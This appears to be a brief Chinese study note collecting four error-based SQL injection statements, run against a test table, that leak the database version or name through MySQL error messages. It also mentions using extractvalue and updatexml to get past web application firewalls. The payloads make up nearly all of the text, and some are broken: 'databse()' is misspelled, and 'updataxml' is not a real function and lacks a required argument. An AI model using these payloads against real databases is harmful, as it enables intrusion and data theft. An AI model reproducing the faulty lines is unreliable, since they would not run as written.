sql报错注入总结【积累中】

==========================第一次总结尝试==============================

首先放一下测试的表

第一条报错注入语句：

select password from sql_test where username = 'admin' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

concat内为具体报错语句

第二条报错注入语句：

 select * from sql_test where id = 1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1;

version处替换成报错语句

第三条报错语句

 select * from sql_test where id = 1 and extractvalue(1,concat(0x5c,databse()));

第四条报错语句

 select * from sql_test where id = 1 and updataxml(1,concat(0x5c,databse()));

database处换成报错语句

顺便提一句updataxml和extractvalue可以用于注入的时候进行绕过waf，用法找sql文档看一下吧

报错语句替换，最核心的还是concat（）函数